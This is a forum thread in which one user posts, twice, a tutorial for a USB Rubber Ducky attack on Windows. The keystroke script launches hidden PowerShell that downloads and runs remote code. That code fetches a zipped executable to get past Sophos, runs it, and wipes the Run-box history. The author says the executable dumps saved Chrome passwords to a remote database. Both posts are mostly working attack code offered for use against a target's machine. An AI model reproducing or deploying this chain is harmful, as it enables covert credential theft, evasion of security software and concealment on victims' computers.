Jump to content

3 Second PowerShell Execution. (As much powershell code as you want!)

WAZ

By WAZ
in Classic USB Rubber Ducky

 Share

Recommended Posts

WAZ Newbie

WAZ

Posted
Posted

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

Script for website:

The code on my website looks something like this... 

Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky: 

DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

PS: I'm not very good at PowerShell Scripting :wacko:

Link to comment
Share on other sites
WAZ Newbie

WAZ

Posted
  • Author
Posted
2 minutes ago, WAZ said:

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

Script for website:

The code on my website looks something like below. You can put whatever you want in here. Personally I used it to download an .EXE which dumps saved chrome passwords into a database using an API we created.  


Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky: 


DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

PS: I'm not very good at PowerShell Scripting :wacko: + First post! 

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...